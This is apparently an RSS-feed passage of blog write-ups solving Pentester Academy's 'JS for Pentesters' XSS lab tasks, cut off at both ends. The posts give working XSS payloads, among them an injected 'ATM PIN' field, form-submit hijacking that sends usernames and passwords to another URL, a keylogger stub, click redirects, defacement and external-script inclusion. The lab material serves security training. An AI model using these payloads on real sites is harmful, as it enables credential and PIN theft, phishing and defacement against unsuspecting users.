<p>1) While playing with <strong>XSS challenges</strong>, it is always recommended to use Mozilla Firefox because Google chrome has inbuilt XSS stopper which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So its strongly recommended to use Firefox instead of chrome.</p> <p>2) The solutions written above is the way we cracked the problem which might be different from the solution videos provided by the SecurityTube. If you need the solution video, you have to subscribe to <a href="http://pentesteracademy.com/"><strong>PentesterAcademy</strong></a>.</p> <p>We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Also, if you get a better way of solving the challenge, please share it with us and we are happy to learn from our readers too. Happy pentesting..</p> Thu, 30 Oct 2014 23:02:07 -0700 https://blog.0daylabs.com/2014/10/30/xss-stealing-auto-complete-js-pentesters-task-12-write/ https://blog.0daylabs.com/2014/10/30/xss-stealing-auto-complete-js-pentesters-task-12-write/ jsp javascript xss security-tube XSS - Replacing images: JS for Pentesters task 11 write up <p>This is one of the interesting challenges from Pentester Academy but a very easy one. This is like a typical noobs where once they got access to a server, first thing to do is to deface the server. We are actually not doing a deface but something similar. Let us see the challenge:</p> <p><a href="http://pentesteracademylab.appspot.com/lab/webapp/jfp/11">JS for Pentesters task 11</a></p> <p>Our objective of this challenge is to Replace the Pentester Academy Banner image with a Defacement Image. Now let us see how can we crack this challenge. After analyzing the source code, we can understand one thing that there is only one <code class="language-plaintext highlighter-rouge">&lt;img&gt;</code> tag in the whole source code.</p> <p>This makes our work much easier. Since there is only 1 <code class="language-plaintext highlighter-rouge">&lt;img&gt;</code> tag, all we have to do is to select the <code class="language-plaintext highlighter-rouge">&lt;img&gt;</code> tag and change its <code class="language-plaintext highlighter-rouge">src</code> attribute. The payload will look like this:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> <span class="nt">&lt;script&gt;</span> <span class="kd">var</span> <span class="nx">script</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementsByTagName</span><span class="p">(</span><span class="dl">'</span><span class="s1">img</span><span class="dl">'</span><span class="p">)[</span><span class="mi">0</span><span class="p">];</span> <span class="nx">script</span><span class="p">.</span><span class="nx">src</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">http://3.bp.blogspot.com/-l8tr4nV1df8/UgYGrFdkhNI/AAAAAAAAAJ8/KRnaurbiZ68/s1600/hacked.jpg</span><span class="dl">"</span><span class="p">;</span> <span class="nt">&lt;/script&gt;</span></code></pre></figure> <p>So what we did was to create a new variable named script and we assigned it with the first <code class="language-plaintext highlighter-rouge">&lt;img&gt;</code> tag using <code class="language-plaintext highlighter-rouge">document.getElementByTagName()</code>. Then we changed its <code class="language-plaintext highlighter-rouge">&lt;img src "" &gt;</code> attribute to a new URL which will get substituted in the place of original Pentester academy logo.</p> <p><strong>Note:</strong></p> <p>1) While playing with <strong>XSS challenges</strong>, it is always recommended to use Mozilla Firefox because Google chrome has inbuilt XSS stopper which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So its strongly recommended to use Firefox instead of chrome.</p> <p>We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Also, if you get a better way of solving the challenge, please share it with us and we are happy to learn from our readers too. Happy pentesting..</p> Thu, 30 Oct 2014 07:03:55 -0700 https://blog.0daylabs.com/2014/10/30/xss-replacing-images-js-pentesters-task-11-write/ https://blog.0daylabs.com/2014/10/30/xss-replacing-images-js-pentesters-task-11-write/ jsp javascript xss security-tube XSS - Include external js using js: JS for Pentesters task 10 write up <p>In the last write up, we saw how we can include an external JavaScript file and execute it via XSS. This is a very similar challenge but a bit different:</p> <p><a href="http://pentesteracademylab.appspot.com/lab/webapp/jfp/10">JS for Pentesters task 10</a></p> <p>Our objective is to Include the JS file available at <a href="http://demofilespa.s3.amazonaws.com/jfptest.js">http://demofilespa.s3.amazonaws.com/jfptest.js</a> into that page. This time things are a bit different. Usually we include the JavaScript contents inside a <code class="language-plaintext highlighter-rouge">&lt;script&gt;</code> tag but here in the challenge, what ever we type in, it will goes inside a <code class="language-plaintext highlighter-rouge">&lt;script&gt;</code> tag so this time, executing a script is a bit difficult.  A very simple way to complete this challenge is to add a closing <code class="language-plaintext highlighter-rouge">&lt;/script&gt;</code> tag and then reopen a new script tag which contains our file:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> <span class="nt">&lt;/script&gt;&lt;script </span><span class="na">src=</span><span class="s">"http://demofilespa.s3.amazonaws.com/jfptest.js"</span><span class="nt">&gt;&lt;/script&gt;</span></code></pre></figure> <p>But while explaining about the challenge, vivek has specifically mentioned that we shouldn’t use this method and should accomplish this task in some other way. So let us see how can we do this in another way. Basically what we need to do is to create a new script element which points to the external JavaScript file and we should add the newly created script element to the head of the HTML document so that it will execute successfully. So the payload looks like this:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> var script = document.createElement("script"); script.type = "text/javascript"; script.src = "http://demofilespa.s3.amazonaws.com/jfptest.js"; document.getElementsByTagName("head")[0].appendChild(script);</code></pre></figure> <p>Like we said above, what we did is that first we created a new <strong>script</strong> element. Then added some attributes to the newly created elements and pointed the src to <code class="language-plaintext highlighter-rouge">http://demofilespa.s3.amazonaws.com/jfptest.js</code> , where out JavaScript file is located. Then we used the <strong>appendChild()</strong> function in JavaScript to append this script at the end of the** &lt;/head&gt;** tag. After a successful run, you can see the cookie in an alert box.</p> <p><strong>Note:</strong></p> <p>1) While playing with <strong>XSS challenges</strong>, it is always recommended to use Mozilla Firefox because Google chrome has inbuilt XSS stopper which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So its strongly recommended to use Firefox instead of chrome.</p> <p>We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Also, if you get a better way of solving the challenge, please share it with us and we are happy to learn from our readers too. Happy pentesting..</p> Wed, 29 Oct 2014 08:06:51 -0700 https://blog.0daylabs.com/2014/10/29/xss-include-external-js-using-js-js-pentesters-task-10-write/ https://blog.0daylabs.com/2014/10/29/xss-include-external-js-using-js-js-pentesters-task-10-write/ jsp javascript xss security-tube XSS - including external js file: JS for Pentesters task 9 write up <p>This challenge is a bit different from the ones that we did till now. Consider a case where you found out an XSS vulnerability but you can enter only limited number of characters through the XSS parameter but you need to do a lot more than that. What will you do ? A possible way is to add the script inside a file and try to inject that file via the xss. Let us see this with an example:</p> <p><a href="http://pentesteracademylab.appspot.com/lab/webapp/jfp/9">JS for Pentesters task 9</a></p> <p>Our objective is to Include an <strong>external JS file</strong> into this page and Code inside that JS should pop the cookie inside an alert box.</p> <p>So the first task is to write a .<strong>js </strong> file and host it somewhere so that it can alert the cookie. The code for the same is:</p> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"> <span class="nx">alert</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">);</span></code></pre></figure> <p>Please note that when you are writing JavaScript inside a file, it shouldn’t be enclosed inside a <code class="language-plaintext highlighter-rouge">&lt;script&gt;</code> tag. So consider we created a file <code class="language-plaintext highlighter-rouge">cookie.js</code> which contains the code to alert the cookie. Now we should host the script somewhere so that it can be accessed via public URL. So I uploaded the script to my blog and tried to inject it to the challenge. The payload looks like this:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> <span class="nt">&lt;script </span><span class="na">src=</span><span class="s">"http://security.securethelock.com/wp-content/uploads/2014/11/cookie.js"</span><span class="nt">&gt;&lt;/script&gt;</span></code></pre></figure> <p>So as you can see, this challenge is fairly easy but it has I hope you learned a good lesson. What we did is very simple. First upload the JavaScript file to a site and get its absolute location. Then you can inject the file via XSS  by using src attribute, inside a <code class="language-plaintext highlighter-rouge">&lt;script&gt;</code> tag.</p> <p><strong>Note:</strong></p> <p>1) While playing with <strong>XSS challenges</strong>, it is always recommended to use Mozilla Firefox because Google chrome has inbuilt XSS stopper which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So its strongly recommended to use Firefox instead of chrome.</p> <p>We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Also, if you get a better way of solving the challenge, please share it with us and we are happy to learn from our readers too. Happy pentesting..</p> Wed, 29 Oct 2014 04:03:52 -0700 https://blog.0daylabs.com/2014/10/29/xss-including-external-js-file-js-pentesters-task-9-write/ https://blog.0daylabs.com/2014/10/29/xss-including-external-js-file-js-pentesters-task-9-write/ jsp javascript xss security-tube XSS - Event listener: JS for Pentesters task 8 <p>We have already seen may challenges write up before that use event listeners like <a href="https://blog.0daylabs.com/2014/10/25/xss-capture-mouse-clicks-redirect-js-pentesters-task-6-write/">Capturing all mouse clicks and redirecting</a>, etcc… before and this is a challenge which is much easier than any of the event listener challenge we have done before. Let us see what the task is:</p> <p><a href="http://pentesteracademylab.appspot.com/lab/webapp/jfp/8">JS for Pentesters Task 8</a></p> <p>Our Objective is to Pop the password in an alert box when the user submits the form. But here there is difference from the other challenges that we have to find out an XSS vulnerability ourselves and there is nothing like a URL parameter which is vulnerable to attack like had in the other challenges. So we have to find out where the vulnerability is first. So the first spot to try is the username column. Lets try injecting an <strong>onmouseover</strong> event listener on the username/email parameter:</p> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"> <span class="nx">admin</span><span class="dl">"</span><span class="s2">onmouseover=</span><span class="dl">"</span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span></code></pre></figure> <p>Give a random password and press sign in. Then if you put the mouse over the email field, you can see an alert and hurraaayyy, we got the XSS. Now our objective is to modify the same payload so that it will pop up the password field when user clicks on signin. Now here is a modified payload that popup the password:</p> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"> <span class="dl">"</span><span class="s2">onmouseover=</span><span class="dl">"</span> <span class="kd">function</span> <span class="nx">intercept</span> <span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">pass</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">forms</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="nx">elements</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="nx">value</span><span class="p">;</span> <span class="nx">alert</span><span class="p">(</span><span class="nx">pass</span><span class="p">);</span> <span class="p">}</span> <span class="nb">document</span><span class="p">.</span><span class="nx">forms</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="nx">onsubmit</span> <span class="o">=</span> <span class="nx">intercept</span><span class="p">;</span></code></pre></figure> <p>Let us see what we did above. Basically we modified the simple XSS script we wrote above (to find XSS) and instead of an alert box, we added one more event listener which executes a function on submitting the form. The function will then access the user inputted value and pops it up in an alert box.</p> <p><strong>Note:</strong></p> <p>1) While playing with <strong>XSS challenges</strong>, it is always recommended to use Mozilla Firefox because Google chrome has inbuilt XSS stopper which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So its strongly recommended to use Firefox instead of chrome.</p> <p>We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Also, if you get a better way of solving the challenge, please share it with us and we are happy to learn from our readers too. Happy pentesting..</p> Mon, 27 Oct 2014 09:25:17 -0700 https://blog.0daylabs.com/2014/10/27/xss-event-listner-js-pentesters-task-8/ https://blog.0daylabs.com/2014/10/27/xss-event-listner-js-pentesters-task-8/ jsp javascript security-tube XSS - KeyLogger with JavaScript: JS for Pentesters task 7 write up <p>In the last write up we saw how we <a href="https://blog.0daylabs.com/2014/10/25/xss-capture-mouse-clicks-redirect-js-pentesters-task-6-write/">Capture all Mouse Clicks and Redirect</a> user to a new webpage. This time what we should do is to capture all the keys that user clicks and we need to send it to the attacker machine.</p> <p><a href="http://pentesteracademylab.appspot.com/lab/webapp/jfp/7">JS for Pentesters task 7</a></p> <p>Our objective is to Create a <strong>KeyLogger</strong> which posts Keystrokes live to an attacker server. So unlike the last write on Mouse Click capture, here, we need to capture the keys that user press and we should also post the same thing to an attacker server so that he can see it live what the user is typing. So the payload looks like this:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> <span class="nt">&lt;script&gt;</span> <span class="kd">function</span> <span class="nx">keyPressed</span><span class="p">(){</span> <span class="nx">alert</span><span class="p">(</span><span class="dl">"</span><span class="s2">key pressed</span><span class="dl">"</span><span class="p">);</span> <span class="p">}</span> <span class="nb">window</span><span class="p">.</span><span class="nx">captureEvents</span> <span class="p">(</span><span class="nx">Event</span><span class="p">.</span><span class="nx">KEYPRESS</span><span class="p">);</span> <span class="nb">window</span><span class="p">.</span><span class="nx">onkeypress</span><span class="o">=</span><span class="nx">keyPressed</span><span class="p">;</span> <span class="nt">&lt;/script&gt;</span></code></pre></figure> <p>So what does this basically do ? <code class="language-plaintext highlighter-rouge">window.captureEvents(Event.KEYPRESS)</code> will actually log any keypress that is basically happening in the webpage and it can also trigger a function while each key is pressed. So here each time when a key is pressed, the function keyPressed() is getting executed and it is showing an <strong>alert(“keyPressed”)</strong>. Instead of this alert message, you can modify the command to post it live to a server that you host in you localhost or somewhere else.</p> <p><strong>Note:</strong></p> <p>1) While cracking this challenge, I was on Windows  and its difficult to host an HTTP server in Windows than on Linux (atleast for me as I don;t like to use Windows much other than for gaming). This is the reason why instead of posting this key log live to our server, we just used an alert() message to confirm that the function is executing. You can modify the script to your needs.</p> <p>2) While playing with <strong>XSS challenges</strong>, it is always recommended to use Mozilla Firefox because Google chrome has inbuilt XSS stopper which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So its strongly recommended to use Firefox instead of chrome.</p> <p>3) You have to <a href="http://meyerweb.com/eric/tools/dencoder/">URL encode</a> the payload before the injection via the url parameter or else this will fail to work.</p> <p>We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Also, if you get a better way of solving the challenge, please share it with us and we are happy to learn from our readers too. Happy pentesting..</p> Mon, 27 Oct 2014 02:51:23 -0700 https://blog.0daylabs.com/2014/10/27/xss-keylogger-javascript-js-pentesters-task-7-write/ https://blog.0daylabs.com/2014/10/27/xss-keylogger-javascript-js-pentesters-task-7-write/ jsp javascript xss security-tube XSS - Capture all Mouse Clicks and Redirect: JS for Pentesters task 6 write up <p>Till now, we have covered several challenge write up from Pentester Academy but this is the first time we are going to make use of  an event handler to get our task done. So basically what is an event Handler ? Let us say we have a situation in which we need to execute a function when the user clicks on a button in the webpage or hover over on something. In order to accomplish this, we can use JavaScript event Handlers.</p> <p><a href="http://pentesteracademylab.appspot.com/lab/webapp/jfp/6">JS for Pentesters task 6</a></p> <p>Our objective is to <strong>Capture all Mouse Clicks and Redirect to http://PentesterAcademy.com</strong>. Let us see how can we approach to solve the problem. Basically what we need to do is simple. We need to see if user does any click on the webpage and if he does, we will redirect the page to Pentester Academy. Let us see how the payload looks:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> <span class="nt">&lt;script&gt;</span> <span class="kd">function</span> <span class="nx">windowEvent</span><span class="p">(){</span> <span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="dl">"</span><span class="s2">http://pentesteracademy.com</span><span class="dl">"</span><span class="p">);</span> <span class="p">}</span> <span class="nb">window</span><span class="p">.</span><span class="nx">captureEvents</span><span class="p">(</span><span class="nx">Event</span><span class="p">.</span><span class="nx">CLICK</span><span class="p">);</span> <span class="nb">window</span><span class="p">.</span><span class="nx">onclick</span><span class="o">=</span><span class="nx">windowEvent</span><span class="p">;</span> <span class="nt">&lt;/script&gt;</span></code></pre></figure> <p>Here, what we do is, we use the <strong>window.captureEvents(Event.CLICK) </strong>to see if the user made any clicks on the particular window.  Then what we do is that on the event of a click, we will call a function to execute (User defined function) called windowEvent. Inside the windowEvent function, we will use the <strong>window.location.replace()</strong> which will redirect the user to the webpage we specify. In short, when user clicks anywhere on the page, the function is triggered and the user is redirected to a new site.</p> <p><strong>Note:</strong></p> <p>1) While playing with <strong>XSS challenges</strong>, it is always recommended to use Mozilla Firefox because Google chrome has inbuilt XSS stopper which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So its strongly recommended to use Firefox instead of chrome.</p> <p>2) You have to <a href="http://meyerweb.com/eric/tools/dencoder/">URL encode</a> the payload before the injection via the url parameter or else this will fail to work</p> <p>We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Also, if you get a better way of solving the challenge, please share it with us and we are happy to learn from our readers too. Happy pentesting..</p> Sat, 25 Oct 2014 07:30:57 -0700 https://blog.0daylabs.com/2014/10/25/xss-capture-mouse-clicks-redirect-js-pentesters-task-6-write/ https://blog.0daylabs.com/2014/10/25/xss-capture-mouse-clicks-redirect-js-pentesters-task-6-write/ jsp javascript securitytube xss XSS - Social Engineering: JS for Pentesters task 5 write up <p>We have already seen some good challenges from Pentester Academy like <a href="https://blog.0daylabs.com/2014/10/23/xss-hijacking-form-submit-js-pentesters-task-3-write/">Hijacking Form submit </a>and <a href="https://blog.0daylabs.com/2014/10/24/xss-modifying-form-fields-js-pentesters-task-4-write/">adding a new form element</a> etc…  This challenge is a bit more exciting one than the ones we solved till now. Let us try a Social Engineering technique with XSS.</p> <p><a href="http://pentesteracademylab.appspot.com/lab/webapp/jfp/5">JS for Pentesters task 5</a></p> <p>Our objective of this challenge is to Remove the Form and add a notification “<strong>Website is Down! Please visit SecurityTube.net</strong>”.  Now let us see how can we solve this:</p> <p>As always, you can see that there is an XSS vulnerability via the URL parameter. The first thing we should do is to remove the form. For that, we can select the Form we need to remove first and then add a notification at the same place saying that the particular website is down with a link to the attacker server. The payload looks like this:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> <span class="nt">&lt;script&gt;</span> <span class="kd">var</span> <span class="nx">remove</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementsByTagName</span><span class="p">(</span><span class="dl">"</span><span class="s2">form</span><span class="dl">"</span><span class="p">)[</span><span class="mi">0</span><span class="p">];</span> <span class="nx">rem</span><span class="p">.</span><span class="nx">parentNode</span><span class="p">.</span><span class="nx">removeChild</span><span class="p">(</span><span class="nx">remove</span><span class="p">);</span> <span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="dl">'</span><span class="s1">Website is Down! Please visit </span><span class="dl">'</span><span class="o">+</span><span class="dl">'</span><span class="s1">SecurityTube.net</span><span class="dl">'</span><span class="p">.</span><span class="nx">link</span><span class="p">(</span><span class="dl">'</span><span class="s1">http://www.securitytube.net</span><span class="dl">'</span><span class="p">));</span> <span class="nt">&lt;/script&gt;</span></code></pre></figure> <p>Let us analyse how the payload works. At first, we are getting the form element that we need to a variable named <strong>remove</strong>. Then we are simply removing the form using the <strong>removeChild() </strong>function in JavaScript which is usually used to remove elements. We also need to print a form saying that the site is down and tempting the user to visit a URL, which can be done using the <strong>document.write()</strong> function in JavaScript which is used to print something to a webpage.</p> <p>Inside the <code class="language-plaintext highlighter-rouge">document.write()</code>, I split the string into 2 parts, with a ‘+’ operator in between. The reason why I did was that the 2nd part should be printed as a link so that users can click on it. In order to print the string which points to a URL (like an href tag in html) we used the function <strong>.link()</strong> in JavaScript, which accepts a url as an argument and converts the string into a clickable URL while printing it into the webpage.</p> <p><strong>Note:</strong></p> <p>1) While playing with <strong>XSS challenges</strong>, it is always recommended to use Mozilla Firefox because Google chrome has inbuilt XSS stopper which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So its strongly recommended to use Firefox instead of chrome.</p> <p>2) The solutions written above is the way we cracked the problem which might be different from the solution videos provided by the SecurityTube. If you need the solution video, you have to subscribe to <a href="http://pentesteracademy.com/"><strong>PentesterAcademy</strong></a>.</p> <p>We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Also, if you get a better way of solving the challenge, please share it with us and we are happy to learn from our readers too. Happy pentesting..</p> Fri, 24 Oct 2014 22:59:25 -0700 https://blog.0daylabs.com/2014/10/24/xss-social-engineering-js-pentesters-task-5-write/ https://blog.0daylabs.com/2014/10/24/xss-social-engineering-js-pentesters-task-5-write/ jsp javascript xss security-tube XSS - Modifying Form fields: JS for Pentesters task 4 write up <p>In the last article we saw how we can <a href="https://blog.0daylabs.com/2014/10/23/xss-hijacking-form-submit-js-pentesters-task-3-write/">Hijack a form submit with XSS</a>. But form hijacking could have been much more interesting if it has more interesting information’s like ATM pin. In this challenge what we do is to add a new column to the form  named “ATM pin” so that before submitting the form, user will enter more information like ATM Pin. That’s awesome isn’t it ? So the objective of this challenge is that:</p> <p><a href="http://pentesteracademylab.appspot.com/lab/webapp/jfp/4">JS for Pentesters Task 4</a></p> <p>1) Add a new form field called “ATM PIN”</p> <p>2) Post the credentials to the Attacker server along with the ATM pin.</p> <p>As always, we have the XSS vulnerability in the page via the URL parameter. You can confirm it by simple alert box injection in FireFox. Now, our task is to add a new input element called ATM Pin. So first, let us see the source code:</p> <p>From the source code, we can see that there are only 1 <strong>form</strong> element which contains 2 input boxes namely email and password. So first lets create an <strong>input </strong>with exactly the same attributes as an email or password input form (place holder and name should be modified). Then we have to add it just above the username field so that it shows up correctly and user should think that the newly added box is legitimate. So the overall payload we used is:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> <span class="nt">&lt;script&gt;</span> <span class="nx">newField</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="dl">"</span><span class="s2">input</span><span class="dl">"</span><span class="p">);</span> <span class="nx">newField</span><span class="p">.</span><span class="nx">setAttribute</span><span class="p">(</span><span class="dl">"</span><span class="s2">type</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">text</span><span class="dl">"</span><span class="p">);</span> <span class="nx">newField</span><span class="p">.</span><span class="nx">setAttribute</span><span class="p">(</span><span class="dl">"</span><span class="s2">value</span><span class="dl">"</span><span class="p">,</span> <span class="dl">""</span><span class="p">);</span> <span class="nx">newField</span><span class="p">.</span><span class="nx">setAttribute</span><span class="p">(</span><span class="dl">"</span><span class="s2">class</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">input-block-level</span><span class="dl">"</span><span class="p">);</span> <span class="nx">newField</span><span class="p">.</span><span class="nx">setAttribute</span><span class="p">(</span><span class="dl">"</span><span class="s2">placeholder</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">ATM Pin</span><span class="dl">"</span><span class="p">);</span> <span class="nx">newField</span><span class="p">.</span><span class="nx">setAttribute</span><span class="p">(</span><span class="dl">"</span><span class="s2">name</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">ATM pin</span><span class="dl">"</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">prev</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">forms</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="nx">elements</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span> <span class="nb">document</span><span class="p">.</span><span class="nx">forms</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="nx">insertBefore</span><span class="p">(</span><span class="nx">newField</span><span class="p">,</span> <span class="nx">prev</span><span class="p">);</span> <span class="kd">function</span> <span class="nx">intercept</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">user</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">forms</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="nx">elements</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="nx">value</span><span class="p">;</span> <span class="kd">var</span> <span class="nx">pass</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">forms</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="nx">elements</span><span class="p">[</span><span class="mi">2</span><span class="p">].</span><span class="nx">value</span><span class="p">;</span> <span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="dl">"</span><span class="s2">http://pentesteracademylab.appspot.com/lab/webapp/1?email=</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">user</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&amp;password=</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">pass</span><span class="p">);</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="p">}</span> <span class="nb">document</span><span class="p">.</span><span class="nx">forms</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="nx">onsubmit</span> <span class="o">=</span> <span class="nx">intercept</span><span class="p">;</span> <span class="nt">&lt;/script&gt;</span></code></pre></figure> <p>Let us analyse how this works. First we create a new element called <strong>newField </strong>and added all the necessary attributes to it like ‘value’, ‘class name’ and even ‘place holder’ so that it looks real professional. Then we selected the first element of the input form. The reason why we are doing this is that , we need to add the newly created one above the username element which is basically the first element of the input form. So we select the username field and assigned it to a variable named <strong>prev. </strong>Now our task is to add the new element just before prev. To do that, we used a JavaScript function called <strong>insertBefore.</strong></p> <p>Then as we saw in the <a href="https://blog.0daylabs.com/2014/10/23/xss-hijacking-form-submit-js-pentesters-task-3-write/">Hijack a form submit with XSS</a> task, we are going to redirect this information to our server. What I did was to redirect the url to Pentester Academy WAP challenge 1 which is basically a Form brute force. As you can see in the write up about the form brute force, the user:pass combination for that challenge is <code class="language-plaintext highlighter-rouge">admin@PentesterAcademy.com:zzzxy</code>. If you enter the same credentials in this challenge after entering the payload, you can see a Window saying <strong>challenge completed</strong>.</p> <p><strong>Note:</strong></p> <p>1) You can easily modify the <strong>window.location.replace</strong> to your localhost where you run a simple HTTP server or you can redirect this to anywhere you want.</p> <p>2) You have to <a href="http://meyerweb.com/eric/tools/dencoder/">URL encode</a> the payload before the injection via the url parameter or else this will fail to work.</p> <p>3) It is always recommended to try out the challenge in Mozilla FireFox and not in Google chrome because chrome has an inbuilt XSS Auditor which will stop the payload from executing.</p> <p>4) The solutions written above is the way we cracked the problem which might be different from the solution videos provided by the SecurityTube. If you need the solution video, you have to subscribe to <a href="http://pentesteracademy.com/"><strong>PentesterAcademy</strong></a>.</p> Fri, 24 Oct 2014 04:30:24 -0700 https://blog.0daylabs.com/2014/10/24/xss-modifying-form-fields-js-pentesters-task-4-write/ https://blog.0daylabs.com/2014/10/24/xss-modifying-form-fields-js-pentesters-task-4-write/ jsp javascript security-tube xss XSS - Hijacking a form submit: JS for Pentesters task 3 write up <p>Lately, we have solved JS for Pentesters <a href="https://blog.0daylabs.com/2014/10/20/modifying-html-javascript-javascript-pentesters-task-1/">task 1</a> and <a href="https://blog.0daylabs.com/2014/10/21/changing-href-links-using-js-javascript-pentesters-task-2/">task 2</a>. Now this is task 3 which is a bit more challenging task that we did before. Let us see what the challenge is:</p> <p><a href="http://pentesteracademylab.appspot.com/lab/webapp/jfp/3"><strong>JS For Pentesters Task 3</strong></a></p> <p>There is a simple login form which accepts a username and a password. Our objective is to Post the Username and Password to Attacker Controlled Server. It is also given that the form is vulnerable to XSS attacks via the URL parameter. As always, lets start Pentesting the form with first trying out an alert box to confirm that it is vulnerable to reflected XSS attacks. So lets us try to inject an alert box in to url parameter.</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> <span class="nt">&lt;script&gt;</span><span class="nx">alert</span><span class="p">(</span><span class="dl">"</span><span class="s2">XSS</span><span class="dl">"</span><span class="p">)</span><span class="nt">&lt;/script&gt;</span></code></pre></figure> <p>So after injecting, the URL looks something like this:</p> <p><code class="language-plaintext highlighter-rouge">http://pentesteracademylab.appspot.com/lab/webapp/jfp/3?url=&lt;script&gt;alert("XSS")&lt;/script&gt;</code></p> <p>If you execute that URL, you can see an alert box which means we are on the right track. The next thing is see how can we post this to attacker server when the user clicks on <strong>Signin</strong>. The best way to do that is to use an <strong>onsubmit </strong>event handler in JavaScript. Theoretically what we should do is that after entering the username and the password, the user will click signin and at that time, our event handler should execute and post the content to a server that we control so that we can see the username/password combination in plain text.</p> <p>In this task either you can run your own HTTP server which can capture the username/pass or you can redirect the user to another site and try to login with the same credentials that user enters (that can be fun I guess :)  ). So the first thing to do is to add an event handler to the onsubmit button. When you take a peek at the source code of the challenge, you can see that there is only 1 form present in the source (which makes our tasks much easier)</p> <p>So first what we will do is to select the form and add an onsubmit event handler and make it execute a function which copy the credentials entered by the user and will post it to the attacker server (or any link we want). So the payload looks like this:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> <span class="nt">&lt;script&gt;</span> <span class="kd">function</span> <span class="nx">intercept</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">user</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">forms</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="nx">elements</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="nx">value</span><span class="p">;</span> <span class="kd">var</span> <span class="nx">pass</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">forms</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="nx">elements</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="nx">value</span><span class="p">;</span> <span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="dl">"</span><span class="s2">http://pentesteracademylab.appspot.com/lab/webapp/1?email=</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">user</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&amp;password=</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">pass</span><span class="p">);</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="p">}</span> <span class="nb">document</span><span class="p">.</span><span class="nx">forms</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span 